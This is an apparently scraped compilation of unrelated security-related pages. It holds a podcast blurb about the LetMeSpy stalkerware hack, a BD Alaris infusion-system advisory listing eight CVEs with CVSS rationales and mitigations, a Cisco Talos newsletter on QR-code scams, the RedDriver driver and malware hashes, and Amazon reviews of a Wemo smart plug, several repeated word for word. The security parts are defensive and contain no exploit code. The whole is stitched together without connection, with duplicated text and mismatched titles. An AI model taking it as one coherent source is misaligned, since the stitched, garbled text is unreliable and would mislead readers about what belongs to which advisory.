Want to read your child's text messages? LetMeSpy says it can help. Want to see where they are? LetMeSpy says it can do that, too. What about employers who are interested in the vague idea of "control and safety" of their business? Look no further than LetMeSpy, of course.  

While LetMeSpy's website tells users that "phone control without your knowledge and consent may be illegal in your country," (it is in the US and many, many others) the app also claims that it can hide itself from view from the person being tracked. And that feature, in particular, is one of the more tell-tale signs of "stalkerware." 

Stalkerware is a term used by the cybersecurity industry to describe mobile apps, primarily on Android, that can access a device's text messages, photos, videos, call records, and GPS locations without the device owner knowing about said surveillance. These types of apps can also automatically record every phone call made and received by a device, turn off a device's WiFi, and take control of the device's camera and microphone to snap photos or record audio—all without the victim knowing that their phone has been compromised. 

Stalkerware poses a serious threat—particularly to survivors of domestic abuse—and Malwarebytes has defended users against these types of apps for years. But the hacking of an app with similar functionality raises questions. 

Today, on the Lock and Code podcast with host David Ruiz, we speak with the hacktivist and security blogger maia arson crimew about the data that was revealed in LetMeSpy's hack, the almost-clumsy efforts by developers to make and market these apps online, and whether this hack—and others in the past—are "good." 

> "I'm the person on the podcast who can say 'We should hack things,' because I don't work for Malwarebytes. But the thing is, I don't think there really is any other way to get info in this industry."

Tune in today. 

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use. 

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

Spy vs. spy: Exploring the LetMeSpy hack, with maia arson crimew

The firmware update package for the wireless card is not properly signed and can be modified.

1.  Cybersecurity at BD
2.  Bulletin
3.  BD Alaris™ System with Guardrails™ Suite MX

BD communicates with our customers about cybersecurity vulnerabilities to help healthcare providers manage potential risks through awareness and guidance.

This notification provides product security information and recommendations related to security vulnerabilities found within the BD Alaris™ System with Guardrails™ Suite MX, versions 12.1.3 and earlier.

*   

As a routine practice, BD has voluntarily shared these vulnerabilities with the U.S. Food and Drug Administration (FDA), the U.S. Department of Homeland Security Cybersecurity and Infrastructure Security Agency (CISA) and Information Sharing and Analysis Organizations (ISAOs) where BD participates. Read Coordinated Vulnerability Disclosure to learn more about our disclosure process.

The eight security vulnerabilities below are present on the BD Alaris™ System v12.1.3 and earlier versions. All the vulnerabilities in this bulletin were discovered through routine internal security testing, which is part of our software development life cycle. **There have been no reports of these vulnerabilities being exploited.**

BD has performed risk assessments on each vulnerability in accordance with AAMI-TIR57 and ISO 14971 where potential safety impact was possible. For all eight vulnerabilities, it has been determined that the product's existing control measures effectively reduce the probability of harm, and the residual risk is considered acceptable. Remediation and deployment planning for these vulnerabilities is currently in progress. This disclosure will be updated when more information is available.

For additional information, customers may request a copy of the latest BD Alaris™ System Product Security White Paper by visiting the BD Cybersecurity Trust Center.

**BD Alaris™ PCU Model 8015, versions 12.1.3 and earlier** 

1\. CVE-2023-30559 - Wireless Card Firmware Improperly Signed (Medium) 

2\. CVE-2023-30560 - PCU Configuration Lacks Authentication (Medium) 

3\. CVE-2023-30561 - Lack of Cryptographic Security of IUI Bus (Medium)  

**BD Alaris™ Guardrails™ Editor, versions 12.1.2 and earlier** 

4\. CVE-2023-30562 - Lack of Dataset Integrity Checking (Medium) 

**BD Alaris™ Systems Manager, versions 12.3 and earlier**  

5\. CVE-2023-30563 - Stored Cross-Site-Scripting (XSS) on User Import Functionality (High) 

6\. CVE-2023-30564 - Stored Cross-Site-Scripting (XSS) on Device Import Functionality (Medium)  

**CQI Reporter, version 10.17 and earlier (only applicable to customers using CQI Reporter)**  

7\. CVE-2023-30565 - CQI Data Sniffing  (Low) 

**Calculation Services, versions 1.0 and earlier (only applicable to customers currently using Interoperability features)** 

8\. CVE-2018-1285 - Apache Log4Net Calculation Services (Low)  

BD is authorized as a Common Vulnerability and Exposures (CVE) Numbering Authority (CNA) by the CVE® Program. As a CNA, BD is authorized to assign CVE identification numbers to newly discovered vulnerabilities in its software-enabled products, which includes using the Common Weakness Enumeration (CWE™) system to classify vulnerability types and applying the Common Vulnerability Scoring System (CVSS) to communicate vulnerability characteristics and severity. BD assigned the below CVSS scores to these vulnerabilities.

**1\. CVE-2023-30559 - Wireless Card Firmware Improperly Signed**

**Vulnerability Description:** The firmware update package for the wireless card is not properly signed and can be modified.

**CVSS 5.2 (Medium)** CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H

**Rationale:** Physical access to the BD Alaris™ PCU is required to exploit this vulnerability. The attack complexity is low because no special privileges are required, and user interaction is not required. If exploited, the threat actor would not be able to gain access to other components of the system. There is low impact to the confidentiality and the integrity of the system. However, there is a high impact to the availability of the system.

**2\. CVE-2023-30560 - PCU Configuration Lacks Authentication**

**Vulnerability Description:** The configuration from the PCU can be modified without authentication using physical connection to the PCU.

**CVSS 6.8 (Medium)** CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Rationale**: Physical access to the BD Alaris™ PCU is required to exploit this vulnerability. The attack complexity is low because no specialized access conditions or extenuating circumstances are required. Additionally, no special privileges are required, and user interaction is not required. If exploited, the threat actor would not be able to gain access to other components of the system. There is a high impact to confidentiality, integrity and availability.

**3\. CVE-2023-30561 - Lack of Cryptographic Security of IUI Bus**

**Vulnerability Description:** The data flowing between the PCU and its modules is insecure. A threat actor with physical access could potentially read or modify data by attaching a specially crafted device while an infusion is running.

**CVSS 6.1 (Medium)** CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

**Rationale:** A threat actor would require physical access to the BD Alaris™ PCU via a specially configured device for protocol exploration and exploitation. While the complexity of this exploit is low, significant technical experience is required. No specialized privileges or user interaction is required. If exploited, the threat actor would not be able to gain access to other components of the system. There is a high impact to confidentiality and integrity. However, there is no impact to the availability of the system.

**4\. CVE-2023-30562 - Lack of Dataset Integrity Checking**

**Vulnerability Description:** A GRE dataset file within Systems Manager can be tampered with and distributed to PCUs.

**CVSS 6.7 (Medium)** CVSS:3.1/AV:A/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H

**Rationale:** A threat actor would require access to an adjacent network to exploit this vulnerability. The attack complexity is low because the attacker only needs to modify certain fields within the system. To modify the file, the threat actor would need to have generalized permissions. System Manager user interaction is required. If exploited, the threat actor would not be able to gain access to other components of the system. There is no impact to the confidentiality of the system. This exploit would impact the integrity of GRE dataset file directly as it would be subject to out-of-band modification. Additionally, any such modification would have the potential of disabling the effective use of downstream PCUs, impacting the overall availability of the system.

**5\. CVE-2023-30563 - Stored Cross-Site Scripting on User Import Functionality**

**Vulnerability Description:** A malicious file could be uploaded into a System Manager User Import Function resulting in a hijacked session.

**CVSS 8.2 (High)** CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N

**Rationale:** A threat actor requires network access to the Systems Manager (SM) application. If no privileges are required on the computer running SM, the complexity of exploiting this vulnerability is low. Systems Manager user interaction is required. If this vulnerability were to be successfully exploited, it could impact other systems containing sensitive information. There is no impact to availability, a low impact to integrity of the SM application and a high impact to confidentiality.

**6\. CVE-2023-30564 - Stored Cross-Site Scripting on Device Import Functionality**

**Vulnerability Description:** Alaris Systems Manager does not perform input validation during the Device Import Function.

**CVSS 6.9 (Medium)** CVSS:3.1/AV:A/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N

**Rationale:** The threat actor would need to be on an adjacent network to successfully exploit this vulnerability. If there is no requirement for an attacker to be authenticated to the host machine, the attack complexity is low. Any Systems Manager user is required to load a malicious payload. This vulnerability could cause impacts beyond the Systems Manager to other components. There is no impact to availability. However, there is low impact to integrity and high impact to confidentiality.

**7\. CVE-2023-30565 - CQI Data Sniffing**

**Vulnerability Description:** An insecure connection between Systems Manager and CQI Reporter application could expose infusion data to an attacker.

**CVSS Score: 3.5 (Low)** CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

**Rationale:** A threat actor would require access to an adjacent network to exploit this vulnerability. The attack complexity is low and there are no specialized privileges or user interaction required. If exploited, the threat actor would not be able to gain access to other components of the system. There is a low impact to confidentiality due to data flow access, there are no impacts to integrity or availability.

**8\. CVE-2018-1285 - Apache Log4Net Calculation Services**

**Vulnerability Description:** A lack of input validation within Apache Log4Net (due to an outdated software version) could allow a threat actor to execute malicious commands.

**CVSS Score: 3.0 (Low)** CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:L

**Rationale**: A threat actor would require local access to Systems Manager. An attacker would be required to have elevated privileges after accessing the target system and modify a vulnerable instance of the Log4Net configuration file. User interaction is not required and, if exploited, the threat actor could not make changes to other components of the system. While there is no impact to confidentiality of the application, there is a low impact to both integrity and availability.

BD has assessed the clinical risk and patient safety impact of these vulnerabilities. The following two vulnerabilities have no clinical impact or safety concern at this time:

**CQI Reporter, version 10.17 and earlier (only applicable to customers using CQI Reporter)**

*   **CQI Data Sniffing (CVE-2023-30565)**
    *   Viewing CQI data has no impact to the function of the BD Alaris™ System.

**BD Alaris™ PCU Model 8015, versions 12.1.3 and earlier**

*   **Lack of Cryptographic Security of IUI Bus (CVE-2023-30561)**
    *   For this vulnerability the likelihood of applying a manned, specially crafted device undetected at the bedside has been determined to be reasonably unforeseeable.

The remaining vulnerabilities have the possibility to impact patient safety. However, the potential for harm can only occur if the vulnerability is exploited; there have been no reports of exploitation in any customer environment or clinical setting.

**BD Alaris™ Point-of-Care Unit (PCU) Model 8015, versions 12.1.3 and earlier**

*   **PCU Configuration Lacks Authentication (CVE-2023-30560)**
    *   The BD Alaris™ PCU has one vulnerability that impacts a single PCU and requires physical access to exploit. If exploited, physical access will allow unauthorized tampering and modification of configurations, which may result in a partial or total loss of integrity. Modifications to firmware, datasets, network credentials and log files are possible, which may impact functionality of the Alaris System and require the PCU to be replaced. The system is designed with features to detect integrity failures. Additionally, users must confirm all datasets prior to activation, as stated in the BD Alaris™ User Manual. BD has assessed product control measures and determined that they reduce the probability of harm to improbable.

**BD Alaris™ Guardrails™ Editor, versions 12.1.2 and earlier**

*   **Lack of Dataset Integrity Checking (CVE-2023-30562)**
    *   Guardrails™ Editor has one vulnerability. If exploited, an attacker can pivot from Systems Manager to Guardrails Editor to misconfigure the dataset. This may result in the inadvertent activation of an undesired dataset on the PCU. However, the system is designed with features to detect integrity failures. Additionally, users must confirm all datasets prior to activation, as stated in the BD Alaris™ User Manual. BD has assessed product control measures and determined that they reduce the probability of harm to improbable.

**BD Alaris™ Systems Manager, versions 12.3 and earlier**

*   **Stored Cross-Site-Scripting (XSS) on User Import Functionality (CVE-2023-30563) and Stored Cross-Site-Scripting (XSS) on Device Import Functionality (CVE-2023-30564)**
    *    BD Alaris™ Systems Manager has two vulnerabilities. If either is exploited, limited administrative services, such as importing new datasets, would lead to a minor delay in therapy until restored; however, the PCU will continue to operate as intended with the existing dataset. The system is designed to limit access to the server to authorized personnel through role-based privileges and access control. BD has assessed product control measures and determined that they reduce the probability of harm to improbable.

**BD Alaris™ EMR Interoperability**

*   **Wireless Card Firmware Improperly Signed (CVE-2023-30559) and Apache Log4Net Calculation Services (CVE-2018-1285)**
    *   There are two vulnerabilities that affect customers using BD Alaris™ EMR Interoperability. If exploited, a loss of application or network connectivity could lead to a delay in therapy. The system is designed to allow a clinician to program the infusion manually (standard non-interop programming workflow). The clinician can immediately program the infusion manually after the failure of an Automated Programming Request(APR). Moreover, the system is designed to limit access to the server to authorized personnel through role-based privileges and access control. BD has assessed product control measures and determined that they reduce the probability of harm to improbable.

To further reduce the risk associated with these vulnerabilities, BD recommends customers implement the following mitigations and compensating controls:

**Network Security**

*   Provide appropriate network perimeter security, such as firewalls, or create Access Control Lists (ACL) to limit network traffic from devices to only the required ports on the required endpoints. The PCU only requires access to DNS, DHCP and Systems Manager on port 3613. The PCU does not accept any unsolicited inbound traffic. Segmenting BD Alaris™ PCUs onto their own VLAN to further enhance the security of BD Alaris™ PCUs is highly recommended.
*   Customers should control network access to the Systems Manager server image by restricting external access to only those addresses and ports indicated in Chapter 1 of the Systems Manager Virtual Machine Deployment Guide. Customers should apply SSL certificates from valid Certificate Authorities, per Chapter 9 of the same document.
*   Enable authentication challenge password for network configuration changes, per Chapter 1 of the Alaris System Maintenance Software User Manual.
*   Rotate Wi-Fi network credentials in alignment with customer security policies and NIST SP 800-63, “Digital Identity Guidelines.” See Network Settings within the Alaris System Maintenance User Manual for instructions on how to manage these credentials. Monitor network traffic for unusual or unexpected traffic and activity. In the event the credentials are suspected of being exposed, change the credentials immediately.
*   Utilize MAC filtering to restrict access to only those approved/whitelisted devices necessary to operate on the network segment containing the BD Alaris™ System.

**Software Security**

*   Periodically inspect BD Alaris™ System components to ensure they are running the correct version of software. Software versions can be found using the instructions in Chapter 4 of the Systems Manager User Manual or Section 6.2.10 of the BD Alaris™ PCU and Pump Module Technical Service Manual.

**System Security**

*   Adhere to industry security best practices regarding access control, identification and authorization, personnel security, and physical protection of assets, as recommended by NIST SP 800-171 Rev. 2, “Protecting Controlled Unclassified Information in Nonfederal Systems and Organizations”.
*   Inspect the BD Alaris™ System prior to use for signs of tampering as indicated in the FIPS 140-2 Compliance Instructions for BD Alaris™ System Products Service Manual.

*   NIST SP 800-171 Rev. 2, “Protecting Controlled Unclassified Information in Nonfederal Systems and Organizations” is available at: https://csrc.nist.gov/publications/detail/sp/800-171/rev-2/final
*   NIST SP 800-63, “Digital Identity Guidelines,” is available at: https://pages.nist.gov/800-63-3/
*   For product or site-specific concerns, contact your BD customer support representative.

CVE-2023-30559: BD Alaris™ System with Guardrails™ Suite MX

QR codes have always served as a way for bad actors to spread malware or even your friendly neighborhood prankster to share Rick Astley’s most famous music video.

Thursday, July 13, 2023 14:07

Welcome to this week’s edition of the Threat Source newsletter.

Although we can probably largely consider the COVID-19 pandemic “over,” many relics from the peak of lockdown and concerns over the virus are still around in mid-2023. It’s still impossible to get a doctor’s appointment quickly, but many restaurants have embraced al fresco dining and QR codes are back.

At one point I had totally written off QR codes as of 2010-ish, but now they’re all over restaurant menus, cash registers, tip jars and advertising. This started during the pandemic as a touch-free way of interacting with consumers and seems to be sticking around even though the days of indoor seating capacities are over.

QR codes have always served as a way for bad actors to spread malware or even your friendly neighborhood prankster to share Rick Astley’s most famous music video. But recently I discovered several “novel” ways in which bad guys are trying to capitalize on society’s newfound trust in QR codes.

Two months ago, Bleeping Computer reported on fake parking tickets floating around major U.S. and U.K. cities that had phony QR codes on them designed to trick users into “paying” a parking ticket they didn’t owe. That same week, there were also reports of phony Microsoft Word documents being sent via email to targets that contained QR codes claiming to be from the Chinese Ministry of Finance, thus bypassing traditional email security that usually scan things like links and the body copy in an email itself.

The local CBS station in Tampa Bay, Florida also came across a fake Amazon advertisement in March that claimed to enlist people who received a postcard to test out new products. When opened, the site on the other end of the QR code asked for the target’s personal and contact information.

I figured we’d be past the days of attackers just slapping QR codes onto random things, but I also thought we were done with QR codes altogether three years ago. So this serves as a PSA to not just scan any QR code you see in the wild “just because.”

Or, if you’re unsure about the origins of a QR code, iOS and Android phones will show a snippet of a URL that the QR code is sending the user before you click on it, so it’s important to double-check that the URL is where you intended on heading (ex., amazon.com). Either that or just ask for a paper menu at the restaurant.

**The one big thing**

Cisco Talos has identified multiple versions of an undocumented malicious driver named “RedDriver,” a driver-based browser hijacker that uses the Windows Filtering Platform (WFP) to intercept browser traffic. This threat appears to target native Chinese speakers, as it searches for Chinese language browsers to hijack. Additionally, the authors are likely Chinese speakers themselves. If installed, the malicious driver can hijack and spy on web traffic, potentially redirecting it to a source of the attacker’s choosing.

**Why do I care?**

This is a concrete example of a recent trend Talos has been following of threat actors taking advantage of a Windows policy loophole that allows the signing and loading of cross-signed kernel mode drivers with signature timestamp prior to July 29, 2015. We have observed over a dozen code-signing certificates with keys and passwords contained in a PFX file hosted on GitHub used in conjunction with these open-source tools. By forging signatures on kernel-mode drivers, attackers can bypass the certificate policies within Windows.

**So now what?**

Microsoft has blocked all certificates discussed in Talos' blogs posted this week and released an advisory on the matter as part of Patch Tuesday. Talos recommends blocking the certificates mentioned in this blog post, as malicious drivers are difficult to detect heuristically and are most effectively blocked based on file hashes or the certificates used to sign them. Comparing the signature timestamp to the compilation date of a driver can sometimes be an effective means of detecting instances of timestamp forging. Specifically, for RedDriver, there are a series of new Cisco Secure product protections in place to detect and block the malicious driver.

**Top security headlines of the week**

The **list of companies affected by the massive MOVEit mass hack continues to grow,** and now includes international hotel chain Radisson and GPS company TomTom. Clop, the ransomware group behind the attack against the MOVEit data transfer software that eventually led to data breaches at more than 100 organizations, added more companies to its leak site this week. Commercial banks Deutsche Bank and Commerzbank are also among the newest victims, with both companies reportedly having clients’ names and account numbers. The parent company of Radisson also confirmed that a “limited number of guest records” were accessed, though it did not provide an exact number. Clop originally used a zero-day vulnerability that’s since been patched to access MOVEit software instances and then steal certain information from users. One threat analyst at New Zealand anti-virus maker Emsisoft estimated that there are now more than 270 businesses affected across the globe, including 17 million individuals. (Tech Crunch, Bloomberg)

With Meta’s new microblogging platform **Threads taking off, users and privacy advocates are criticizing its privacy and data collection policies.** Meta, which is the parent company behind Facebook and Instagram, launched Threads last week to much fanfare and gained millions of new users in the first few hours of the app’s existence. However, the app has yet to launch in the European Union because it violates several GDPR policies. Threads’ privacy policy states the app has access to GPS location, cameras, photos, IP information, the type of device being used and device signals including “Bluetooth signals, nearby Wi-Fi access points, beacons and cell towers.” In general, Meta seems to collect more personal information on Threads users compared to other platforms, though not necessarily more than Facebook and Instagram, Meta’s other major platforms. (The Guardian, CPO Magazine)

Despite major efforts from international governments and the private sector to combat ransomware, **payments to threat actors are set to hit a new record in 2023.** A new report from blockchain company Chainanalysis reports that ransomware victims have paid adversaries $449.1 million in the first six months of this year, after that number didn’t even hit $500 million in 2022. If this pace continues, 2023 would be the second-most profitable year ever for ransomware groups behind 2021. Security researchers believe the dip in 2022 could be contributed to several factors, including Russia’s invasion of Ukraine disrupting some major APT groups and new decryption software from government agencies and private companies that can return victims’ files for free. Chainanalysis analysts state in the report that big-game hunting is largely contributing to this year’s revenue — in these cases, threat actors target major corporations that likely have the funds to pay large, requested ransom payments. (Wired, Bleeping Computer)

**Can’t get enough Talos?**

*   Cisco Talos Reports Microsoft Windows Policy Loophole Being Exploited by Threat Actor
*   Hackers target Chinese-speaking Microsoft users with ‘RedDriver’ browser hijacker
*   Gergana Karadzhova-Dangela wants to send the ladder back down to the next generation of incident responders
*   The growth of commercial spyware based intelligence providers without legal or ethical supervision
*   Microsoft discloses more than 130 vulnerabilities as part of July’s Patch Tuesday, four exploited in the wild

**Upcoming events where you can find Talos**

**BlackHat** **(Aug. 5 - 10)**

Las Vegas, Nevada

**Grace Hopper Celebration (Sept. 26 - 29)**

Orlando, Florida

> _Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation._

**Most prevalent malware files from Talos telemetry over the past week**

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
**MD5:** 7bdbd180c081fa63ca94f9c22c457376  
**Typical Filename:** c0dwjdi6a.dll  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.33515991

**SHA 256:** 1c25a55f121d4fe4344914e4d5c89747b838506090717f3fb749852b2d8109b6  
**MD5:** 4c9a8e82a41a41323d941391767f63f7  
**Typical Filename:** !!mreader.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Generic::sheath

**SHA 256:** 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1  
**MD5:** 3e10a74a7613d1cae4b9749d7ec93515  
**Typical Filename:** IMG001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Coinminer::1201

**SHA 256:** e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c  
**MD5:** a087b2e6ec57b08c0d0750c60f96a74c  
**Typical Filename:** AAct.exe  
**Claimed Product:** N/A  
**Detection Name:** PUA.Win.Tool.Kmsauto::1201

**SHA 256:** b4d8d7cbec7fe4c24dcb9b38f6036a58b765efda10c42fce7bbe2b2bf79cd53e  
**MD5:** c585f4faee96a0bec3b0f93f37239008  
**Typical Filename:** stream.txt  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Autoit::211461.in02

QR codes are relevant again for everyone from diners to threat actors

Incorrect signature verification of the firmware during the Device Firmware Update process of Belkin Wemo Smart Plug WSP080 v1.2 allows attackers to cause a Denial of Service (DoS) via a crafted firmware file.

_5.0 out of 5 stars_ It Works  
Reviewed in the United States on March 10, 2021

I am a long-time user of Wemo, dating back to 2012/2013 when they had some of their first-gen “brick” smart plugs and things worked well. When it came time to buy a new one a few weeks ago, I was shocked to see so many poor reviews. It’s difficult to truly gauge these reviews because in the smart home world, there are an infinite amount of variables that came create good or bad experiences. Mine is as follow and I hope it helps some of you...- My home is 1400 square feet about 5 years old- I have AT&T fiber with almost all smart devices connecting to my 2.4 network (yes, I split up my 2.4 and 5 networks)- This wemo is about 30 feet from my wifi router, with a few objects in the way, but a lot of open space in between- Setup was easy inside of HomeKit, which is specifically why I purchased this unit- I am all HomeKit in the house, so no Alexa or Google Asst.- This wemo smart plug is powering another smart device we don’t want on 24/7, so I automated the wemo to turn on once we leave the home- Thus far, it is working without a single issue- The size is very small, compared to their older models and models of other units, thus, it isn’t an eye sore to look at nor does it cover up the socket below itRecap- ever user experience is totally relative to their smart home setup. So far, I am very happy with this purchase.

**Reviews with images**

*   Sort reviews by
    

**Top reviews from the United States**

**There was a problem filtering reviews right now. Please try again later.**

Reviewed in the United States on March 24, 2021

You would think Away Mode set up would be easy to find and easy to set up . For this reason I've gone back to using the WEMO Smart Plugs exclusively and the newer simple set up WEMO plugs fit the bill. What I like about the WEMO vs the Wyze or Amazon brand is not the hardware so much but the software specifically the Away Mode on the WEMO that allow you to set the time schedule with in the Away Mode. Only want devices coming on between 6-9 pm no problem. You can set which devices you want to have go on and off randomly within this parameter just like you would if you were home. The Wyze doesn't seem to have this Away Mode technology at all and the Amazon branded plugs, to get to the WEMO sophistication, requires the Guard Plus be purchased granted it does a lot more but its also $49/yr for the subscription. I will say the WEMO still has a quirkiness to it even with the simple set up to get the Wifi handshake that sometimes requires multiple resets on some of the devices if you move it from one location to another. I'll put up with this to get the controllability for a vacation mode software that I like to have.

One person found this helpful

Report

Reviewed in the United States on October 26, 2020

I have had WEMO devices essentially since the beginning... and my OLD ones are getting a little creaky. The WEMO "mini" is HUGE now compared to version 3. I got a Version 3 set of 3 plugs and this is the review for those. I agree with the users here that you now have to set up an account with WEMO if you haven't already in order to make them work. At least they don't charge you anything. I use them with Alexa... and Alexa really isn't that user friendly either. The other thing you MUST do is activate Alexa or Home or Google IN the actual WEMO app or the NEW versions of the devices will not work. ALL my devices worked after getting the WEMO Version 3, EXCEPT the version 3. SO I had to Google how to fix it. Luckily there are other miserable people out there who put very clear instructions in the blogs and I followed those and was able to get it to work without having to contact customer service. Adding a WEMO V3 to the app is easier than adding the old devices.

2 people found this helpful

Report

Reviewed in the United States on March 10, 2021

I am a long-time user of Wemo, dating back to 2012/2013 when they had some of their first-gen “brick” smart plugs and things worked well. When it came time to buy a new one a few weeks ago, I was shocked to see so many poor reviews. It’s difficult to truly gauge these reviews because in the smart home world, there are an infinite amount of variables that came create good or bad experiences. Mine is as follow and I hope it helps some of you...

\- My home is 1400 square feet about 5 years old  
\- I have AT&T fiber with almost all smart devices connecting to my 2.4 network (yes, I split up my 2.4 and 5 networks)  
\- This wemo is about 30 feet from my wifi router, with a few objects in the way, but a lot of open space in between  
\- Setup was easy inside of HomeKit, which is specifically why I purchased this unit  
\- I am all HomeKit in the house, so no Alexa or Google Asst.  
\- This wemo smart plug is powering another smart device we don’t want on 24/7, so I automated the wemo to turn on once we leave the home  
\- Thus far, it is working without a single issue  
\- The size is very small, compared to their older models and models of other units, thus, it isn’t an eye sore to look at nor does it cover up the socket below it

Recap- ever user experience is totally relative to their smart home setup. So far, I am very happy with this purchase.

_5.0 out of 5 stars_ It Works  
Reviewed in the United States on March 10, 2021

I am a long-time user of Wemo, dating back to 2012/2013 when they had some of their first-gen “brick” smart plugs and things worked well. When it came time to buy a new one a few weeks ago, I was shocked to see so many poor reviews. It’s difficult to truly gauge these reviews because in the smart home world, there are an infinite amount of variables that came create good or bad experiences. Mine is as follow and I hope it helps some of you...

\- My home is 1400 square feet about 5 years old  
\- I have AT&T fiber with almost all smart devices connecting to my 2.4 network (yes, I split up my 2.4 and 5 networks)  
\- This wemo is about 30 feet from my wifi router, with a few objects in the way, but a lot of open space in between  
\- Setup was easy inside of HomeKit, which is specifically why I purchased this unit  
\- I am all HomeKit in the house, so no Alexa or Google Asst.  
\- This wemo smart plug is powering another smart device we don’t want on 24/7, so I automated the wemo to turn on once we leave the home  
\- Thus far, it is working without a single issue  
\- The size is very small, compared to their older models and models of other units, thus, it isn’t an eye sore to look at nor does it cover up the socket below it

Recap- ever user experience is totally relative to their smart home setup. So far, I am very happy with this purchase.

Images in this review

 

Reviewed in the United States on February 10, 2022

I have been a Wemo user since 2015.

Last week on the 4th, my home experienced a brief power outage. At the time, I was using 5 devices (2 Insights and 3 Mini Smart plugs). When power was restored, the 2 Insights were “Not detected” by the Wemo app and also in the Amazon Alexa app. The Insights appeared to be connected to my WiFi. I unplugged them for a few hours; when I plugged them in again they connected to the network but were not detected in the app.

Prior to the outage, I had deleted a rule and modified another one. After the outage, I also added a new rule. For the next few days, I experienced issues with the changes not being subsequently reflected in the app and also not being used to control the devices.

I installed the app on an Amazon Fire tablet. Once I logged into the app, it showed the rules that I want. So, at this point, the correct rules are showing on the Fire but none of my iOS devices.

After a few days of hoping the “Not detected” devices would reappear, I gave up and ordered a new plug from Amazon. I received the “Simple Setup Smart Outlet” yesterday. It arrived with minimal instructions. First, I attempted to follow the path for “Auto setup with Alexa”. That process failed repeatedly. So, I then installed Apple Home app and was able to get the device configured. I then created the rule that I wanted to associate with the new device using the iOS app.

However, the previous problem with rules persisted. I uninstalled the Apple Home app and the rule inconsistency problem persisted. I remember seeing a message that rules would remain in iCloud after uninstalling the Apple Home app. Even though, the app was gone, the iCloud Home setting was still on. I turned the setting off on all iOS devices. Since then, everything seems okay.

I noticed that “Apple HomeKit” shows in the description for the Wemo that I bought in 2018. I may have installed Apple Home then and decided that I did not want to use and uninstalled. I wonder if that could have caused a one-way pull of Wemo data to iCloud. And, after that the iOS app and the plugs were pulling data from iCloud instead of directly from Wemo’s cloud storage (though it looks like they were all being properly stored in Wemo’s cloud). This would account for the phantom rules.

After spending a few hours doing “Simple Setup”, the appearance in the app across iOS and Fire devices is as desired, devices show correctly in Alexa, and the correct programs are controlling the plugs.

One person found this helpful

Report

**Top reviews from other countries**

_4.0 out of 5 stars_ Funciona muy bien, casi siempre.

Reviewed in Mexico on February 21, 2021

En casa este dispositivo se integra con el ecosistema de HomeKit de Apple. Me costó algo de trabajo configurarlo, no estoy seguro si fue problema del dispositivo o de mis redes wifi que no eran del todo compatible (tuve que resetear varias veces el access point después de hacer cambios al canal y al radio). Ya tengo unas semanas usándolo y generalmente funciona muy bien. Muy de vez en cuando "el dispositivo no responde". Decidí no devolverlo y conservarlo porque, como digo, prácticamente funciona siempre, tal vez con un poco de retraso (aunque Siri inmediatamente me responde que el dispositivo no responde, sí termina encendiéndose o apagándose unos segundos después) y mi access point (un AirPort Express ya viejito) puede contribuir a este comportamiento.

2 people found this helpful

Report

_5.0 out of 5 stars_ Es fácil de usar y configurar

Reviewed in Mexico on December 30, 2022

Es fácil de usar y configurar

_3.0 out of 5 stars_ Se desconecta muy seguido

Reviewed in Mexico on December 18, 2021

Lamentablemente era mejor el modelo pasado, este es más pequeño y se desconocía mucho.

_5.0 out of 5 stars_ Al 100

Reviewed in Mexico on January 24, 2022

Cuesta caro pero cumple al 100 con homekit.

_5.0 out of 5 stars_ Buena opción para homekit

Reviewed in Mexico on May 5, 2021

Al ser mi segundo producto de Wemo, la instalación fue mucho más fácil y rápida

CVE-2023-33768: Wemo Smart Plug (Simple Setup Smart Outlet for Smart Home, Control Lights and Devices Remotely Works w/Alexa, Google Assistant, Apple HomeKit)(Pack of 1) - - Amazon.com

Tag

#wifi